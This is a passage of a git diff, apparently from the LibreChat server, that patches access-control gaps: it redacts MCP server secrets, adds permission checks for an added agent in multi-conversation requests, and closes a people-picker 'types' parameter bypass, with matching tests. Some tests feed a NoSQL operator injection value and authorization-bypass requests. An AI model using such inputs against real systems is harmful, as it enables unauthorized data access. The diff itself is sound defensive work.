getResourcePermissionsMap.mockResolvedValueOnce(permMap); + + mockReq.body = { + name: 'Legit Agent', + provider: 'openai', + model: 'gpt-4', + edges: [{ from: 
'self_placeholder', to: targetAgent.id, edgeType: 'handoff' }], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + }); + + test('createAgentHandler should allow edges referencing non-existent agents (self-reference at create time)', async () => { + mockReq.body = { + name: 'Self-Ref Agent', + provider: 'openai', + model: 'gpt-4', + edges: [{ from: 'agent_does_not_exist_yet', to: 'agent_also_new', edgeType: 'handoff' }], + }; + + await createAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(201); + }); + + test('updateAgentHandler should return 403 when user lacks VIEW on an edge-referenced agent', async () => { + const ownedAgent = await Agent.create({ + id: `agent_${nanoid()}`, + author: mockReq.user.id, + name: 'Owned Agent', + provider: 'openai', + model: 'gpt-4', + tools: [], + }); + + const permMap = new Map([[ownedAgent._id.toString(), PermissionBits.VIEW]]); + getResourcePermissionsMap.mockResolvedValueOnce(permMap); + + mockReq.params = { id: ownedAgent.id }; + mockReq.body = { + edges: [{ from: ownedAgent.id, to: targetAgent.id, edgeType: 'handoff' }], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(403); + const response = mockRes.json.mock.calls[0][0]; + expect(response.agent_ids).toContain(targetAgent.id); + expect(response.agent_ids).not.toContain(ownedAgent.id); + }); + + test('updateAgentHandler should succeed when edges field is absent from payload', async () => { + const ownedAgent = await Agent.create({ + id: `agent_${nanoid()}`, + author: mockReq.user.id, + name: 'Owned Agent', + provider: 'openai', + model: 'gpt-4', + tools: [], + }); + + mockReq.params = { id: ownedAgent.id }; + mockReq.body = { name: 'Renamed Agent' }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.status).not.toHaveBeenCalledWith(403); + const response = mockRes.json.mock.calls[0][0]; + 
expect(response.name).toBe('Renamed Agent'); + }); + }); }); diff --git a/api/server/controllers/mcp.js b/api/server/controllers/mcp.js index e5dfff61ca..729f01da9d 100644 --- a/api/server/controllers/mcp.js +++ b/api/server/controllers/mcp.js @@ -7,9 +7,11 @@ */ const { logger } = require('@librechat/data-schemas'); const { + MCPErrorCodes, + redactServerSecrets, + redactAllServerSecrets, isMCPDomainNotAllowedError, isMCPInspectionFailedError, - MCPErrorCodes, } = require('@librechat/api'); const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider'); const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config'); @@ -181,10 +183,8 @@ const getMCPServersList = async (req, res) => { return res.status(401).json({ message: 'Unauthorized' }); } - // 2. Get all server configs from registry (YAML + DB) const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId); - - return res.json(serverConfigs); + return res.json(redactAllServerSecrets(serverConfigs)); } catch (error) { logger.error('[getMCPServersList]', error); res.status(500).json({ error: error.message }); @@ -215,7 +215,7 @@ const createMCPServerController = async (req, res) => { ); res.status(201).json({ serverName: result.serverName, - ...result.config, + ...redactServerSecrets(result.config), }); } catch (error) { logger.error('[createMCPServer]', error); @@ -243,7 +243,7 @@ const getMCPServerById = async (req, res) => { return res.status(404).json({ message: 'MCP server not found' }); } - res.status(200).json(parsedConfig); + res.status(200).json(redactServerSecrets(parsedConfig)); } catch (error) { logger.error('[getMCPServerById]', error); res.status(500).json({ message: error.message }); @@ -274,7 +274,7 @@ const updateMCPServerController = async (req, res) => { userId, ); - res.status(200).json(parsedConfig); + res.status(200).json(redactServerSecrets(parsedConfig)); } catch (error) { logger.error('[updateMCPServer]', error); const 
mcpErrorResponse = handleMCPError(error, res); diff --git a/api/server/middleware/accessResources/canAccessAgentFromBody.js b/api/server/middleware/accessResources/canAccessAgentFromBody.js index f8112af14d..572a86f5e5 100644 --- a/api/server/middleware/accessResources/canAccessAgentFromBody.js +++ b/api/server/middleware/accessResources/canAccessAgentFromBody.js @@ -1,42 +1,144 @@ const { logger } = require('@librechat/data-schemas'); const { Constants, + Permissions, ResourceType, + SystemRoles, + PermissionTypes, isAgentsEndpoint, isEphemeralAgentId, } = require('librechat-data-provider'); +const { checkPermission } = require('~/server/services/PermissionService'); const { canAccessResource } = require('./canAccessResource'); +const { getRoleByName } = require('~/models/Role'); const { getAgent } = require('~/models/Agent'); /** - * Agent ID resolver function for agent_id from request body - * Resolves custom agent ID (e.g., "agent_abc123") to MongoDB ObjectId - * This is used specifically for chat routes where agent_id comes from request body - * + * Resolves custom agent ID (e.g., "agent_abc123") to a MongoDB document. * @param {string} agentCustomId - Custom agent ID from request body - * @returns {Promise} Agent document with _id field, or null if not found + * @returns {Promise} Agent document with _id field, or null if ephemeral/not found */ const resolveAgentIdFromBody = async (agentCustomId) => { - // Handle ephemeral agents - they don't need permission checks - // Real agent IDs always start with "agent_", so anything else is ephemeral if (isEphemeralAgentId(agentCustomId)) { - return null; // No permission check needed for ephemeral agents + return null; } - - return await getAgent({ id: agentCustomId }); + return getAgent({ id: agentCustomId }); }; /** - * Middleware factory that creates middleware to check agent access permissions from request body. 
- * This middleware is specifically designed for chat routes where the agent_id comes from req.body
- * instead of route parameters.
+ * Creates a `canAccessResource` middleware for the given agent ID
+ * and chains to the provided continuation on success.
+ *
+ * @param {string} agentId - The agent's custom string ID (e.g., "agent_abc123")
+ * @param {number} requiredPermission - Permission bit(s) required
+ * @param {import('express').Request} req
+ * @param {import('express').Response} res - Written on deny; continuation called on allow
+ * @param {Function} continuation - Called when the permission check passes
+ * @returns {Promise<void>}
+ */
+const checkAgentResourceAccess = (agentId, requiredPermission, req, res, continuation) => {
+  const middleware = canAccessResource({
+    resourceType: ResourceType.AGENT,
+    requiredPermission,
+    resourceIdParam: 'agent_id',
+    idResolver: () => resolveAgentIdFromBody(agentId),
+  });
+
+  const tempReq = {
+    ...req,
+    params: { ...req.params, agent_id: agentId },
+  };
+
+  return middleware(tempReq, res, continuation);
+};
+
+/**
+ * Middleware factory that validates MULTI_CONVO:USE role permission and, when
+ * addedConvo.agent_id is a non-ephemeral agent, the same resource-level permission
+ * required for the primary agent (`requiredPermission`). Caches the resolved agent
+ * document on `req.resolvedAddedAgent` to avoid a duplicate DB fetch in `loadAddedAgent`.
+ *
+ * @param {number} requiredPermission - Permission bit(s) to check on the added agent resource
+ * @returns {(req: import('express').Request, res: import('express').Response, next: Function) => Promise<void>}
+ */
+const checkAddedConvoAccess = (requiredPermission) => async (req, res, next) => {
+  const addedConvo = req.body?.addedConvo;
+  if (!addedConvo || typeof addedConvo !== 'object' || Array.isArray(addedConvo)) {
+    return next();
+  }
+
+  try {
+    if (!req.user?.role) {
+      return res.status(403).json({
+        error: 'Forbidden',
+        message: 'Insufficient permissions for multi-conversation',
+      });
+    }
+
+    if (req.user.role !== SystemRoles.ADMIN) {
+      const role = await getRoleByName(req.user.role);
+      const hasMultiConvo = role?.permissions?.[PermissionTypes.MULTI_CONVO]?.[Permissions.USE];
+      if (!hasMultiConvo) {
+        return res.status(403).json({
+          error: 'Forbidden',
+          message: 'Multi-conversation feature is not enabled',
+        });
+      }
+    }
+
+    const addedAgentId = addedConvo.agent_id;
+    if (!addedAgentId || typeof addedAgentId !== 'string' || isEphemeralAgentId(addedAgentId)) {
+      return next();
+    }
+
+    if (req.user.role === SystemRoles.ADMIN) {
+      return next();
+    }
+
+    const agent = await resolveAgentIdFromBody(addedAgentId);
+    if (!agent) {
+      return res.status(404).json({
+        error: 'Not Found',
+        message: `${ResourceType.AGENT} not found`,
+      });
+    }
+
+    const hasPermission = await checkPermission({
+      userId: req.user.id,
+      role: req.user.role,
+      resourceType: ResourceType.AGENT,
+      resourceId: agent._id,
+      requiredPermission,
+    });
+
+    if (!hasPermission) {
+      return res.status(403).json({
+        error: 'Forbidden',
+        message: `Insufficient permissions to access this ${ResourceType.AGENT}`,
+      });
+    }
+
+    req.resolvedAddedAgent = agent;
+    return next();
+  } catch (error) {
+    logger.error('Failed to validate addedConvo access permissions', error);
+    return res.status(500).json({
+      error: 'Internal Server Error',
+      message: 'Failed to validate addedConvo access permissions',
+    });
+  }
+}; + +/** + * Middleware factory that checks agent access permissions from request body. + * Validates both the primary agent_id and, when present, addedConvo.agent_id + * (which also requires MULTI_CONVO:USE role permission). * * @param {Object} options - Configuration options * @param {number} options.requiredPermission - The permission bit required (1=view, 2=edit, 4=delete, 8=share) * @returns {Function} Express middleware function * * @example - * // Basic usage for agent chat (requires VIEW permission) * router.post('/chat', * canAccessAgentFromBody({ requiredPermission: PermissionBits.VIEW }), * buildEndpointOption, @@ -46,11 +148,12 @@ const resolveAgentIdFromBody = async (agentCustomId) => { const canAccessAgentFromBody = (options) => { const { requiredPermission } = options; - // Validate required options if (!requiredPermission || typeof requiredPermission !== 'number') { throw new Error('canAccessAgentFromBody: requiredPermission is required and must be a number'); } + const addedConvoMiddleware = checkAddedConvoAccess(requiredPermission); + return async (req, res, next) => { try { const { endpoint, agent_id } = req.body; @@ -67,28 +170,13 @@ const canAccessAgentFromBody = (options) => { }); } - // Skip permission checks for ephemeral agents - // Real agent IDs always start with "agent_", so anything else is ephemeral + const afterPrimaryCheck = () => addedConvoMiddleware(req, res, next); + if (isEphemeralAgentId(agentId)) { - return next(); + return afterPrimaryCheck(); } - const agentAccessMiddleware = canAccessResource({ - resourceType: ResourceType.AGENT, - requiredPermission, - resourceIdParam: 'agent_id', // This will be ignored since we use custom resolver - idResolver: () => resolveAgentIdFromBody(agentId), - }); - - const tempReq = { - ...req, - params: { - ...req.params, - agent_id: agentId, - }, - }; - - return agentAccessMiddleware(tempReq, res, next); + return checkAgentResourceAccess(agentId, requiredPermission, req, res, 
afterPrimaryCheck); } catch (error) { logger.error('Failed to validate agent access permissions', error); return res.status(500).json({ diff --git a/api/server/middleware/accessResources/canAccessAgentFromBody.spec.js b/api/server/middleware/accessResources/canAccessAgentFromBody.spec.js new file mode 100644 index 0000000000..47f1130d13 --- /dev/null +++ b/api/server/middleware/accessResources/canAccessAgentFromBody.spec.js @@ -0,0 +1,509 @@ +const mongoose = require('mongoose'); +const { + ResourceType, + SystemRoles, + PrincipalType, + PrincipalModel, +} = require('librechat-data-provider'); +const { MongoMemoryServer } = require('mongodb-memory-server'); +const { canAccessAgentFromBody } = require('./canAccessAgentFromBody'); +const { User, Role, AclEntry } = require('~/db/models'); +const { createAgent } = require('~/models/Agent'); + +describe('canAccessAgentFromBody middleware', () => { + let mongoServer; + let req, res, next; + let testUser, otherUser; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + await mongoose.connect(mongoServer.getUri()); + }); + + afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await mongoose.connection.dropDatabase(); + + await Role.create({ + name: 'test-role', + permissions: { + AGENTS: { USE: true, CREATE: true, SHARE: true }, + MULTI_CONVO: { USE: true }, + }, + }); + + await Role.create({ + name: 'no-multi-convo', + permissions: { + AGENTS: { USE: true, CREATE: true, SHARE: true }, + MULTI_CONVO: { USE: false }, + }, + }); + + await Role.create({ + name: SystemRoles.ADMIN, + permissions: { + AGENTS: { USE: true, CREATE: true, SHARE: true }, + MULTI_CONVO: { USE: true }, + }, + }); + + testUser = await User.create({ + email: 'test@example.com', + name: 'Test User', + username: 'testuser', + role: 'test-role', + }); + + otherUser = await User.create({ + email: 'other@example.com', + name: 'Other User', + username: 'otheruser', + 
role: 'test-role', + }); + + req = { + user: { id: testUser._id, role: testUser.role }, + params: {}, + body: { + endpoint: 'agents', + agent_id: 'ephemeral_primary', + }, + }; + res = { + status: jest.fn().mockReturnThis(), + json: jest.fn(), + }; + next = jest.fn(); + + jest.clearAllMocks(); + }); + + describe('middleware factory', () => { + test('throws if requiredPermission is missing', () => { + expect(() => canAccessAgentFromBody({})).toThrow( + 'canAccessAgentFromBody: requiredPermission is required and must be a number', + ); + }); + + test('throws if requiredPermission is not a number', () => { + expect(() => canAccessAgentFromBody({ requiredPermission: '1' })).toThrow( + 'canAccessAgentFromBody: requiredPermission is required and must be a number', + ); + }); + + test('returns a middleware function', () => { + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + expect(typeof middleware).toBe('function'); + expect(middleware.length).toBe(3); + }); + }); + + describe('primary agent checks', () => { + test('returns 400 when agent_id is missing on agents endpoint', async () => { + req.body.agent_id = undefined; + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(400); + }); + + test('proceeds for ephemeral primary agent without addedConvo', async () => { + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + + test('proceeds for non-agents endpoint (ephemeral fallback)', async () => { + req.body.endpoint = 'openAI'; + req.body.agent_id = undefined; + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + }); + + describe('addedConvo — absent or invalid shape', () => { 
+ test('calls next when addedConvo is absent', async () => { + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + + test('calls next when addedConvo is a string', async () => { + req.body.addedConvo = 'not-an-object'; + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + + test('calls next when addedConvo is an array', async () => { + req.body.addedConvo = [{ agent_id: 'agent_something' }]; + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + }); + + describe('addedConvo — MULTI_CONVO permission gate', () => { + test('returns 403 when user lacks MULTI_CONVO:USE', async () => { + req.user.role = 'no-multi-convo'; + req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith( + expect.objectContaining({ message: 'Multi-conversation feature is not enabled' }), + ); + }); + + test('returns 403 when user.role is missing', async () => { + req.user = { id: testUser._id }; + req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + + test('ADMIN bypasses MULTI_CONVO check', async () => { + req.user.role = SystemRoles.ADMIN; + req.body.addedConvo = { agent_id: 'ephemeral_x', endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await 
middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + }); + + describe('addedConvo — agent_id shape validation', () => { + test('calls next when agent_id is ephemeral', async () => { + req.body.addedConvo = { agent_id: 'ephemeral_xyz', endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + + test('calls next when agent_id is absent', async () => { + req.body.addedConvo = { endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + + test('calls next when agent_id is not a string (object injection)', async () => { + req.body.addedConvo = { agent_id: { $gt: '' }, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + }); + + describe('addedConvo — agent resource ACL (IDOR prevention)', () => { + let addedAgent; + + beforeEach(async () => { + addedAgent = await createAgent({ + id: `agent_added_${Date.now()}`, + name: 'Private Agent', + provider: 'openai', + model: 'gpt-4', + author: otherUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: otherUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 15, + grantedBy: otherUser._id, + }); + }); + + test('returns 403 when requester has no ACL for the added agent', async () => { + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + 
expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith( + expect.objectContaining({ + message: 'Insufficient permissions to access this agent', + }), + ); + }); + + test('returns 404 when added agent does not exist', async () => { + req.body.addedConvo = { + agent_id: 'agent_nonexistent_999', + endpoint: 'agents', + model: 'gpt-4', + }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(404); + }); + + test('proceeds when requester has ACL for the added agent', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + + test('denies when ACL permission bits are insufficient', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 2 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + + test('caches resolved agent on req.resolvedAddedAgent', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: 
PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(req.resolvedAddedAgent).toBeDefined(); + expect(req.resolvedAddedAgent._id.toString()).toBe(addedAgent._id.toString()); + }); + + test('ADMIN bypasses agent resource ACL for addedConvo', async () => { + req.user.role = SystemRoles.ADMIN; + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + expect(req.resolvedAddedAgent).toBeUndefined(); + }); + }); + + describe('end-to-end: primary real agent + addedConvo real agent', () => { + let primaryAgent, addedAgent; + + beforeEach(async () => { + primaryAgent = await createAgent({ + id: `agent_primary_${Date.now()}`, + name: 'Primary Agent', + provider: 'openai', + model: 'gpt-4', + author: testUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: primaryAgent._id, + permBits: 15, + grantedBy: testUser._id, + }); + + addedAgent = await createAgent({ + id: `agent_added_${Date.now()}`, + name: 'Added Agent', + provider: 'openai', + model: 'gpt-4', + author: otherUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: otherUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 15, + grantedBy: otherUser._id, + }); + + req.body.agent_id = primaryAgent.id; + }); + + 
test('both checks pass when user has ACL for both agents', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + expect(req.resolvedAddedAgent).toBeDefined(); + }); + + test('primary passes but addedConvo denied → 403', async () => { + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + + test('primary denied → 403 without reaching addedConvo check', async () => { + const foreignAgent = await createAgent({ + id: `agent_foreign_${Date.now()}`, + name: 'Foreign Agent', + provider: 'openai', + model: 'gpt-4', + author: otherUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: otherUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: foreignAgent._id, + permBits: 15, + grantedBy: otherUser._id, + }); + + req.body.agent_id = foreignAgent.id; + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + }); + + describe('ephemeral primary + real addedConvo agent', () => { + let addedAgent; + + beforeEach(async () => { + addedAgent = 
await createAgent({ + id: `agent_added_${Date.now()}`, + name: 'Added Agent', + provider: 'openai', + model: 'gpt-4', + author: otherUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: otherUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 15, + grantedBy: otherUser._id, + }); + }); + + test('runs full addedConvo ACL check even when primary is ephemeral', async () => { + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + + test('proceeds when user has ACL for added agent (ephemeral primary)', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + }); +}); diff --git a/api/server/middleware/checkPeoplePickerAccess.js b/api/server/middleware/checkPeoplePickerAccess.js index 0e604272db..af2154dbba 100644 --- a/api/server/middleware/checkPeoplePickerAccess.js +++ b/api/server/middleware/checkPeoplePickerAccess.js @@ -2,13 +2,20 @@ const { logger } = require('@librechat/data-schemas'); const { PrincipalType, PermissionTypes, Permissions } = require('librechat-data-provider'); const { getRoleByName } = require('~/models/Role'); +const VALID_PRINCIPAL_TYPES = new Set([ + PrincipalType.USER, + PrincipalType.GROUP, + 
PrincipalType.ROLE, +]); + /** - * Middleware to check if user has permission to access people picker functionality - * Checks specific permission based on the 'type' query parameter: - * - type=user: requires VIEW_USERS permission - * - type=group: requires VIEW_GROUPS permission - * - type=role: requires VIEW_ROLES permission - * - no type (mixed search): requires either VIEW_USERS OR VIEW_GROUPS OR VIEW_ROLES + * Middleware to check if user has permission to access people picker functionality. + * Validates requested principal types via `type` (singular) and `types` (comma-separated or array) + * query parameters against the caller's role permissions: + * - user: requires VIEW_USERS permission + * - group: requires VIEW_GROUPS permission + * - role: requires VIEW_ROLES permission + * - no type filter (mixed search): requires at least one of the above */ const checkPeoplePickerAccess = async (req, res, next) => { try { @@ -28,7 +35,7 @@ const checkPeoplePickerAccess = async (req, res, next) => { }); } - const { type } = req.query; + const { type, types } = req.query; const peoplePickerPerms = role.permissions[PermissionTypes.PEOPLE_PICKER] || {}; const canViewUsers = peoplePickerPerms[Permissions.VIEW_USERS] === true; const canViewGroups = peoplePickerPerms[Permissions.VIEW_GROUPS] === true; @@ -49,15 +56,32 @@ const checkPeoplePickerAccess = async (req, res, next) => { }, }; - const check = permissionChecks[type]; - if (check && !check.hasPermission) { - return res.status(403).json({ - error: 'Forbidden', - message: check.message, - }); + const requestedTypes = new Set(); + + if (type && VALID_PRINCIPAL_TYPES.has(type)) { + requestedTypes.add(type); } - if (!type && !canViewUsers && !canViewGroups && !canViewRoles) { + if (types) { + const typesArray = Array.isArray(types) ? 
types : types.split(','); + for (const t of typesArray) { + if (VALID_PRINCIPAL_TYPES.has(t)) { + requestedTypes.add(t); + } + } + } + + for (const requested of requestedTypes) { + const check = permissionChecks[requested]; + if (!check.hasPermission) { + return res.status(403).json({ + error: 'Forbidden', + message: check.message, + }); + } + } + + if (requestedTypes.size === 0 && !canViewUsers && !canViewGroups && !canViewRoles) { return res.status(403).json({ error: 'Forbidden', message: 'Insufficient permissions to search for users, groups, or roles', @@ -67,7 +91,7 @@ const checkPeoplePickerAccess = async (req, res, next) => { next(); } catch (error) { logger.error( - `[checkPeoplePickerAccess][${req.user?.id}] checkPeoplePickerAccess error for req.query.type = ${req.query.type}`, + `[checkPeoplePickerAccess][${req.user?.id}] error for type=${req.query.type}, types=${req.query.types}`, error, ); return res.status(500).json({ diff --git a/api/server/middleware/checkPeoplePickerAccess.spec.js b/api/server/middleware/checkPeoplePickerAccess.spec.js index 52bf0e6724..9a229610de 100644 --- a/api/server/middleware/checkPeoplePickerAccess.spec.js +++ b/api/server/middleware/checkPeoplePickerAccess.spec.js @@ -173,6 +173,171 @@ describe('checkPeoplePickerAccess', () => { expect(next).not.toHaveBeenCalled(); }); + it('should deny access when using types param to bypass type-specific check', async () => { + req.query.types = PrincipalType.GROUP; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for groups', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should deny access when types contains 
any unpermitted type', async () => { + req.query.types = `${PrincipalType.USER},${PrincipalType.ROLE}`; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for roles', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should allow access when all requested types are permitted', async () => { + req.query.types = `${PrincipalType.USER},${PrincipalType.GROUP}`; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: true, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + + it('should validate types when provided as array (Express qs parsing)', async () => { + req.query.types = [PrincipalType.GROUP, PrincipalType.ROLE]; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: true, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for groups', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should enforce permissions for combined type and types params', async () => { + req.query.type = PrincipalType.USER; + req.query.types = PrincipalType.GROUP; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + 
[Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for groups', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should treat all-invalid types values as mixed search', async () => { + req.query.types = 'foobar'; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + + it('should deny when types is empty string and user has no permissions', async () => { + req.query.types = ''; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: 